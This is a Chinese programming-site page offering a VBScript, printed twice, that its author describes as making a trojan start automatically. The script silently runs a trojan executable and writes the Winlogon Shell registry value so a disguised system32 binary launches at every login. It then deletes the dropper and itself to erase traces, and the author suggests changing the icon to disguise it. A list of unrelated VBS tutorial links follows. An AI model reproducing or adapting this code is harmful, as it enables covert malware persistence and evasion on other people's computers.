vbs 注冊表實(shí)現(xiàn)木馬自啟動
更新時(shí)間:2009年05月13日 17:06:34 作者:
自己搗鼓了半天,終于寫出了個(gè)腳本,實(shí)現(xiàn)flux在注冊表中的啟動,當(dāng)然是更隱蔽的方法,別人知道了這個(gè)地方也就沒戲了。
呵呵~不過別人一般沒這個(gè)閑工夫檢查那么多位置的!就連我也做不到~~
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //運(yùn)行木馬程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//寫進(jìn)注冊表項(xiàng)實(shí)現(xiàn)自啟動
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木馬的執(zhí)行完畢
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毀尸滅跡
再修改下圖標(biāo)就大功告成了!
復(fù)制代碼 代碼如下:
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "%windir%\flumasko.exe",0 //運(yùn)行木馬程序
set sm=Wscript.CreateObject("WScript.Shell")
sm.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe %systemroot%\system32\winmgmt.exe"
//寫進(jìn)注冊表項(xiàng)實(shí)現(xiàn)自啟動
set WshShell=WScript.CreateObject("WScript.Shell")
WScript.Sleep 2000
//等木馬的執(zhí)行完畢
Set fso=CreateObject("Scripting.FileSystemObject")
f=fso.DeleteFile ("flumasko.exe")
f=fso.DeleteFile (WScript.ScriptName)
//毀尸滅跡
相關(guān)文章
VBS教程:VBscript語句-Option Explicit 語句
VBS教程:VBscript語句-Option Explicit 語句...2006-11-11vbs實(shí)現(xiàn)的eMule電驢自動關(guān)機(jī)腳本代碼
verycd,eMule電驢官方網(wǎng)站上說:為了不違背共享精神,是不會為eMule電驢添加自動關(guān)機(jī)功能的,這要多費(fèi)電呀,在網(wǎng)上看了一個(gè)方法,感覺非常不錯(cuò),改掉了原代碼的不足之處2008-07-07vbs(asp) ByVal ByRef函數(shù)調(diào)用使用說明
ByVal 傳送參數(shù)內(nèi)存的一個(gè)拷貝給被調(diào)用者。也就是說,棧中壓入的直接就是所傳的值。 ByRef 傳送參數(shù)內(nèi)存的實(shí)際地址給被調(diào)用者。也就是說,棧中壓入的是實(shí)際內(nèi)容的地址。被調(diào)用者可以直接更改該地址中的內(nèi)容。2008-09-09vbscript include的辦法實(shí)現(xiàn)代碼
vbscript本身沒有include這樣包含其他vbs文件的支持,在asp或html頁面里可以用<script ...這樣來包含一個(gè)vbs文件,如果是直接運(yùn)行的vbs腳本,就只有用其他辦法來代替這個(gè)功能了。2009-02-02VBS教程:VBScript 基礎(chǔ)-VBScript編碼約定
VBS教程:VBScript 基礎(chǔ)-VBScript編碼約定...2006-11-11